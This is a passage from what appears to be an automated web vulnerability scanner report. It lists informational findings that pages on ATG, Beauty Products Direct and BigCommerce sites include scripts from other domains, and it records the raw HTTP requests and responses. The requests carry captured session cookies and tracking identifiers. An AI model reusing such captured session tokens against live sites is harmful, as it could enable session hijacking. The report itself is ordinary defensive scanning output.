X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:53:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:54 GMT
Content-Length: 27516
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>Request Passwor
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/stylesheets/safari-fixes.css?version=5">
   <script type="text/javascript" src="https://static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

20.67. https://www.atg.com/en/register/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /en/register/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/register/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:53:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:51 GMT
Content-Length: 43457
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>Register - ATG<
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/stylesheets/safari-fixes.css?version=5">
   <script type="text/javascript" src="https://static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

20.68. https://www.atg.com/service/main.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /service/main.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8 HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Content-Language: 7cd9f92e1f6617753dfce39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:37:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:31 GMT
Content-Length: 62157
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe
...[SNIP]...
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.69. http://www.beautyproductsdirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyproductsdirect.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.beautyproductsdirect.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:22 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Tue, 17 May 2011 11:55:25 GMT
ETag: "29a4892-2c7c-4dd2622d"
Accept-Ranges: bytes
Content-Length: 11388
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Beauty Products Dire
...[SNIP]...
</script>
<script src="http://code.jquery.com/jquery-latest.js"></script>
...[SNIP]...

20.70. http://www.beautyproductsdirect.com/lashes.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyproductsdirect.com
Path:   /lashes.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lashes.html HTTP/1.1
Host: www.beautyproductsdirect.com
Proxy-Connection: keep-alive
Referer: http://www.beautyproductsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=70985859.1555886779.1315345524.1315345524.1315345524.1; __utmb=70985859.1.10.1315345524; __utmc=70985859; __utmz=70985859.1315345524.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:56 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Tue, 17 May 2011 11:55:29 GMT
ETag: "29a4c72-21ef-4dd26231"
Accept-Ranges: bytes
Content-Length: 8687
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Beauty Products Dire
...[SNIP]...
</script>
<script src="http://code.jquery.com/jquery-latest.js"></script>
...[SNIP]...

20.71. http://www.bigcommerce.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigcommerce.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15435
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.72. http://www.bigcommerce.com/in-the-news.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigcommerce.com
Path:   /in-the-news.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /in-the-news.php HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 70448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.73. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigcommerce.com
Path:   /lp/e1-lp-ecommerce.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6564
Connection: close
Content-Type: text/html

<html>
<head>
   <!-- Google Analytics (V3) MUST IMMEDIATELY FOLLOW OPENING <head> TAG BEFORE GOOGLE WEBSITE OPTIMIZER -->
<script type="text/javascript" src="https://www.bigcommerce.com/js/gascript.js?
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.74. http://www.bigcommerce.com/plans.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigcommerce.com
Path:   /plans.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plans.php HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/in-the-news.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 27530
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.75. https://www.bigcommerce.com/buzz.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bigcommerce.com
Path:   /buzz.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /buzz.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413513744:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343313744:41658941.2.10.1315341506; 2__utmc=^first.1378413513744:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.5.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 21572
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.76. https://www.bigcommerce.com/careers.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bigcommerce.com
Path:   /careers.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413586567:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343386567:41658941.8.10.1315341506; 2__utmc=^first.1378413586567:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.19.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:40:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 19250
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.77. https://www.bigcommerce.com/compatible-with.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bigcommerce.com
Path:   /compatible-with.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /compatible-with.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://www.bigcommerce.com/buzz.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413564393:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343364393:41658941.3.10.1315341506; 2__utmc=^first.1378413564393:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.7.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 57374
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.78. https://www.bigcommerce.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bigcommerce.com
Path:   /login.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /login.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://www.bigcommerce.com/compatible-with.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413566287:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343366287:41658941.4.10.1315341506; 2__utmc=^first.1378413566287:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.9.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14684
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.79. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bigcommerce.com
Path:   /pci-compliant-shopping-cart-software.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pci-compliant-shopping-cart-software.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://account.bigcommerce.com/cart.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
